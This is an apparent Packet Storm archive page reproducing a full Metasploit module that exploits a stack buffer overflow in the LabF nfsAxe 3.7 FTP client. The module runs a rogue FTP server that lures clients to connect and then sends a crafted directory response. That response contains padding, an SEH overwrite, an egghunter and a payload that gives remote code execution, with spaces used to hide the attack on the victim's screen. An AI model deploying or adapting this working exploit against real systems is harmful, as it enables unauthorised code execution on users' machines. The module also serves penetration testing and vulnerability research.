what you don't know can hurt you

LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow

LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow
Posted Jan 11, 2018
Authored by Daniel Teixeira, Tulpa | Site metasploit.com

This Metasploit module exploits a buffer overflow in the LabF nfsAxe 3.7 FTP Client allowing remote code execution.

tags | exploit, remote, overflow, code execution
MD5 | 8d30c79823a88f61fd7afa9d88d0562e

LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::TcpServer
include Msf::Exploit::Seh
include Msf::Exploit::Remote::Egghunter

def initialize(info = {})
super(update_info(info,
'Name' => 'LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the LabF nfsAxe 3.7 FTP Client allowing remote
code execution.
},
'Author' =>
[
'Tulpa', # Original exploit author
'Daniel Teixeira' # MSF module author
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '42011' ]
],
'Payload' =>
{
'BadChars' => "\x00\x0a\x10",
},
'Platform' => 'win',
'Targets' =>
[
# p/p/r in wcmpa10.dll
[ 'Windows Universal', {'Ret' => 0x6801549F } ]
],
'Privileged' => false,
'DefaultOptions' =>
{
'SRVHOST' => '0.0.0.0',
},
'DisclosureDate' => 'May 15 2017',
'DefaultTarget' => 0))

register_options(
[
OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ])
])
end

def exploit
srv_ip_for_client = datastore['SRVHOST']
if srv_ip_for_client == '0.0.0.0'
if datastore['LHOST']
srv_ip_for_client = datastore['LHOST']
else
srv_ip_for_client = Rex::Socket.source_address('50.50.50.50')
end
end

srv_port = datastore['SRVPORT']

print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}")
super
end

def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)
print_status("#{client.peerhost} - connected.")

res = client.get_once.to_s.strip
print_status("#{client.peerhost} - Request: #{res}") unless res.empty?
print_status("#{client.peerhost} - Response: Sending 220 Welcome")
welcome = "220 Welcome.\r\n"
client.put(welcome)

res = client.get_once.to_s.strip
print_status("#{client.peerhost} - Request: #{res}")
print_status("#{client.peerhost} - Response: sending 331 OK")
user = "331 OK.\r\n"
client.put(user)

res = client.get_once.to_s.strip
print_status("#{client.peerhost} - Request: #{res}")
print_status("#{client.peerhost} - Response: Sending 230 OK")
pass = "230 OK.\r\n"
client.put(pass)
res = client.get_once.to_s.strip
print_status("#{client.peerhost} - Request: #{res}")

eggoptions = { :checksum => true }
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)

# "\x20"s are used to make the attack less obvious
# on the target machine's screen.
sploit = "220 \""
sploit << "\x20"*(9833 - egg.length)
sploit << egg
sploit << generate_seh_record(target.ret)
sploit << hunter
sploit << "\x20"*(576 - hunter.length)
sploit << "\" is current directory\r\n"

print_status("#{client.peerhost} - Request: Sending the malicious response")
client.put(sploit)

end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    1 Files
  • 2
    Feb 2nd
    2 Files
  • 3
    Feb 3rd
    17 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    16 Files
  • 7
    Feb 7th
    19 Files
  • 8
    Feb 8th
    1 Files
  • 9
    Feb 9th
    2 Files
  • 10
    Feb 10th
    15 Files
  • 11
    Feb 11th
    20 Files
  • 12
    Feb 12th
    12 Files
  • 13
    Feb 13th
    18 Files
  • 14
    Feb 14th
    17 Files
  • 15
    Feb 15th
    4 Files
  • 16
    Feb 16th
    4 Files
  • 17
    Feb 17th
    34 Files
  • 18
    Feb 18th
    15 Files
  • 19
    Feb 19th
    19 Files
  • 20
    Feb 20th
    20 Files
  • 21
    Feb 21st
    15 Files
  • 22
    Feb 22nd
    2 Files
  • 23
    Feb 23rd
    2 Files
  • 24
    Feb 24th
    16 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close